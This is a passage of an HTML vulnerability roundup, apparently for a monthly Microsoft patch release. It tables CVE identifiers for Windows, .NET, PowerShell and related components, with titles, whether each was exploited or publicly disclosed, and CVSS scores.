undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55248"><span style='font-size: undefined;'>CVE-2025-55248</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>.NET, .NET Framework, and Visual Studio Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54132"><span style='font-size: undefined;'>CVE-2025-54132</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GitHub CVE-2025-54132: Arbitrary Image Fetch in Mermaid Diagram Tool</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.4</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Developer Tools ESU Windows vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:15.2%"/><col style="width:35.04%"/><col style="width:13.76%"/><col style="width:18.4%"/><col style="width:17.599999999999998%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25004"><span style='font-size: undefined;'>CVE-2025-25004</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PowerShell Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>ESU Windows vulnerabilities</strong></h3><table><colgroup data-width='1250.0000000000002'><col style="width:11.717495987158907%"/><col style="width:44.62279293739967%"/><col style="width:13.80417335473515%"/><col style="width:15.569823434991973%"/><col style="width:14.285714285714285%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287"><span style='font-size: undefined;'>CVE-2025-59287</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Server Update Service (WSUS) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59295"><span style='font-size: undefined;'>CVE-2025-59295</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows URL Parsing Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58718"><span style='font-size: undefined;'>CVE-2025-58718</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Desktop Client Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59230"><span style='font-size: undefined;'>CVE-2025-59230</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59187"><span style='font-size: undefined;'>CVE-2025-59187</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55692"><span style='font-size: undefined;'>CVE-2025-55692</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Error Reporting Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55701"><span style='font-size: undefined;'>CVE-2025-55701</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59277"><span style='font-size: undefined;'>CVE-2025-59277</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59275"><span style='font-size: undefined;'>CVE-2025-59275</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59278"><span style='font-size: undefined;'>CVE-2025-59278</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59242"><span style='font-size: undefined;'>CVE-2025-59242</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58714"><span style='font-size: undefined;'>CVE-2025-58714</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24052"><span style='font-size: undefined;'>CVE-2025-24052</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Agere Modem Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24990"><span style='font-size: undefined;'>CVE-2025-24990</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Agere Modem Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59201"><span style='font-size: undefined;'>CVE-2025-59201</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Network Connection Status Indicator (NCSI) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58726"><span style='font-size: undefined;'>CVE-2025-58726</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows SMB Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55687"><span style='font-size: undefined;'>CVE-2025-55687</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55335"><span style='font-size: undefined;'>CVE-2025-55335</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows NTFS Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59208"><span style='font-size: undefined;'>CVE-2025-59208</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows MapUrlToZone Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59196"><span style='font-size: undefined;'>CVE-2025-59196</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59202"><span style='font-size: undefined;'>CVE-2025-59202</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Desktop Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59205"><span style='font-size: undefined;'>CVE-2025-59205</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58725"><span style='font-size: undefined;'>CVE-2025-58725</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows COM+ Event System Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58737"><span style='font-size: undefined;'>CVE-2025-58737</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Desktop Protocol Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59282"><span style='font-size: undefined;'>CVE-2025-59282</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Internet Information Services (IIS) Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58732"><span style='font-size: undefined;'>CVE-2025-58732</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58735"><span style='font-size: undefined;'>CVE-2025-58735</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58730"><span style='font-size: undefined;'>CVE-2025-58730</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58733"><span style='font-size: undefined;'>CVE-2025-58733</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58736"><span style='font-size: undefined;'>CVE-2025-58736</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55678"><span style='font-size: undefined;'>CVE-2025-55678</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55700"><span style='font-size: undefined;'>CVE-2025-55700</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58717"><span style='font-size: undefined;'>CVE-2025-58717</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59259"><span style='font-size: undefined;'>CVE-2025-59259</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58729"><span style='font-size: undefined;'>CVE-2025-58729</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59185"><span style='font-size: undefined;'>CVE-2025-59185</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NTLM Hash Disclosure Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59244"><span style='font-size: undefined;'>CVE-2025-59244</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NTLM Hash Disclosure Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58739"><span style='font-size: undefined;'>CVE-2025-58739</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Windows File Explorer Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59214"><span style='font-size: undefined;'>CVE-2025-59214</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Windows File Explorer Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59258"><span style='font-size: undefined;'>CVE-2025-59258</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Active Directory Federation Services (ADFS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55695"><span style='font-size: undefined;'>CVE-2025-55695</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows WLAN AutoConfig Service Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59190"><span style='font-size: undefined;'>CVE-2025-59190</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59253"><span style='font-size: undefined;'>CVE-2025-59253</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59211"><span style='font-size: undefined;'>CVE-2025-59211</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Push Notification Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59209"><span style='font-size: undefined;'>CVE-2025-59209</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Push Notification Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59188"><span style='font-size: undefined;'>CVE-2025-59188</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59198"><span style='font-size: undefined;'>CVE-2025-59198</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47827"><span style='font-size: undefined;'>CVE-2025-47827</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2025-47827: Secure Boot bypass in IGEL OS before 11</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2016-9535"><span style='font-size: undefined;'>CVE-2016-9535</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2016-9535: LibTIFF Heap Buffer Overflow Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59280"><span style='font-size: undefined;'>CVE-2025-59280</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows SMB Client Tampering Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.1</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Mariner Open Source Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:9.134615384615383%"/><col style="width:51.76282051282052%"/><col style="width:13.782051282051283%"/><col style="width:13.62179487179487%"/><col style="width:11.698717948717949%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: 